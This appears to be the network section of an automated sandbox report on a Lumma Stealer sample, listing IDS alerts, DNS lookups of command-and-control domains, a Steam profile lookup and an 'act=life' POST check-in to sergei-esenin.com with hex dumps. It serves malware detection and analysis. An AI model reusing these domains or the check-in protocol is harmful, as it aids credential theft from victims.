                                                                                                                                              2024-10-14T01:53:08.578976+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.6619391.1.1.153UDP
                                                                                                                                              2024-10-14T01:53:08.590060+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.6607821.1.1.153UDP
                                                                                                                                              2024-10-14T01:53:08.604996+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.6509021.1.1.153UDP
                                                                                                                                              2024-10-14T01:53:08.622762+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.6533881.1.1.153UDP
                                                                                                                                              2024-10-14T01:53:08.633360+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.6628351.1.1.153UDP
                                                                                                                                              2024-10-14T01:53:08.645214+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.6549741.1.1.153UDP
                                                                                                                                              2024-10-14T01:53:09.989306+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.649711104.102.49.254443TCP
                                                                                                                                              2024-10-14T01:53:10.780359+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649712104.21.53.8443TCP
                                                                                                                                              2024-10-14T01:53:10.780359+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649712104.21.53.8443TCP
                                                                                                                                              2024-10-14T01:53:11.774975+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649713104.21.53.8443TCP
                                                                                                                                              2024-10-14T01:53:11.774975+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649713104.21.53.8443TCP

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Oct 14, 2024 01:53:08.687642097 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:08.687685966 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.687858105 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:08.690566063 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:08.690577030 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.406605959 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.406754971 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:09.456362963 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:09.456377983 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.456793070 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.508071899 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:09.551062107 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:09.591439962 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.989279985 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.989306927 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.989315033 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.989449024 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:09.989473104 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.989481926 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:09.989551067 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:10.120626926 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.120666981 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.120774031 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:10.120814085 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.120831966 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:10.120862961 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:10.127675056 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.127758026 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:10.127765894 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.127806902 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:10.127810001 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.127880096 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:10.151645899 CEST49711443192.168.2.6104.102.49.254
                                                                                                                                              Oct 14, 2024 01:53:10.151671886 CEST44349711104.102.49.254192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.182065964 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.182102919 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.182174921 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.182531118 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.182545900 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.668561935 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.668668032 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.670047045 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.670056105 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.670481920 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.671471119 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.671492100 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.671557903 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.780404091 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.780457973 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.780513048 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.780520916 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.780535936 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.780567884 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.780575037 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.780648947 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.780693054 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.780900002 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.780915022 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.780949116 CEST49712443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.780955076 CEST44349712104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.839265108 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.839308977 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.839378119 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.840306044 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:10.840321064 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:11.328017950 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:11.328169107 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:11.329579115 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:11.329591990 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:11.329943895 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:11.330996990 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:11.331018925 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:11.331079006 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:11.775005102 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:11.775114059 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:11.775176048 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:11.775281906 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:11.775304079 CEST44349713104.21.53.8192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:11.775320053 CEST49713443192.168.2.6104.21.53.8
                                                                                                                                              Oct 14, 2024 01:53:11.775327921 CEST44349713104.21.53.8192.168.2.6

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Oct 14, 2024 01:53:08.553925991 CEST5451053192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.562597990 CEST53545101.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.567956924 CEST5058553192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.577115059 CEST53505851.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.578975916 CEST6193953192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.587779999 CEST53619391.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.590059996 CEST6078253192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.601989031 CEST53607821.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.604995966 CEST5090253192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.620500088 CEST53509021.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.622761965 CEST5338853192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.631412029 CEST53533881.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.633359909 CEST6283553192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.642296076 CEST53628351.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.645214081 CEST5497453192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.654048920 CEST53549741.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:08.668932915 CEST5020353192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:08.676573038 CEST53502031.1.1.1192.168.2.6
                                                                                                                                              Oct 14, 2024 01:53:10.154522896 CEST5627253192.168.2.61.1.1.1
                                                                                                                                              Oct 14, 2024 01:53:10.181081057 CEST53562721.1.1.1192.168.2.6

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Oct 14, 2024 01:53:08.553925991 CEST192.168.2.61.1.1.10xb338Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.567956924 CEST192.168.2.61.1.1.10x68c9Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.578975916 CEST192.168.2.61.1.1.10xd474Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.590059996 CEST192.168.2.61.1.1.10x384aStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.604995966 CEST192.168.2.61.1.1.10x3ef5Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.622761965 CEST192.168.2.61.1.1.10xc6a8Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.633359909 CEST192.168.2.61.1.1.10x9f6aStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.645214081 CEST192.168.2.61.1.1.10x2568Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.668932915 CEST192.168.2.61.1.1.10xf456Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:10.154522896 CEST192.168.2.61.1.1.10x2d07Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Oct 14, 2024 01:53:08.562597990 CEST1.1.1.1192.168.2.60xb338Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.577115059 CEST1.1.1.1192.168.2.60x68c9Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.587779999 CEST1.1.1.1192.168.2.60xd474Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.601989031 CEST1.1.1.1192.168.2.60x384aName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.620500088 CEST1.1.1.1192.168.2.60x3ef5Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.631412029 CEST1.1.1.1192.168.2.60xc6a8Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.642296076 CEST1.1.1.1192.168.2.60x9f6aName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.654048920 CEST1.1.1.1192.168.2.60x2568Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:08.676573038 CEST1.1.1.1192.168.2.60xf456No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:10.181081057 CEST1.1.1.1192.168.2.60x2d07No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                                                              Oct 14, 2024 01:53:10.181081057 CEST1.1.1.1192.168.2.60x2d07No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • steamcommunity.com
                                                                                                                                              • sergei-esenin.com

                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.649711104.102.49.2544432488C:\Users\user\Desktop\file.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-10-13 23:53:09 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Host: steamcommunity.com
                                                                                                                                              2024-10-13 23:53:09 UTC1870INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Date: Sun, 13 Oct 2024 23:53:09 GMT
                                                                                                                                              Content-Length: 34837
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: sessionid=86a2ffc6c6d3475f3b05b4f1; Path=/; Secure; SameSite=None
                                                                                                                                              Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                              2024-10-13 23:53:09 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                              2024-10-13 23:53:10 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                              Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                              2024-10-13 23:53:10 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                              Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                              2024-10-13 23:53:10 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.649712104.21.53.84432488C:\Users\user\Desktop\file.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-10-13 23:53:10 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 8
                                                                                                                                              Host: sergei-esenin.com
                                                                                                                                              2024-10-13 23:53:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                              Data Ascii: act=life
                                                                                                                                              2024-10-13 23:53:10 UTC553INHTTP/1.1 200 OK
                                                                                                                                              Date: Sun, 13 Oct 2024 23:53:10 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xeGPcQcmzJx5mas0YFjAT4k5GWVhsVWSnx6mXYb9Dbvde52s3XREYgvR27kWJX9sOioZMF3tNrVYxqjcCq2IHptQl5IXMEXMLWmUEMIdhEEtQBN2j5Cx%2BlB%2Fs8f55w%2BHgv9mqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8d233f621bb0de96-EWR
                                                                                                                                              2024-10-13 23:53:10 UTC816INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                              Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                              2024-10-13 23:53:10 UTC1369INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
                                                                                                                                              Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
                                                                                                                                              2024-10-13 23:53:10 UTC1369INData Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
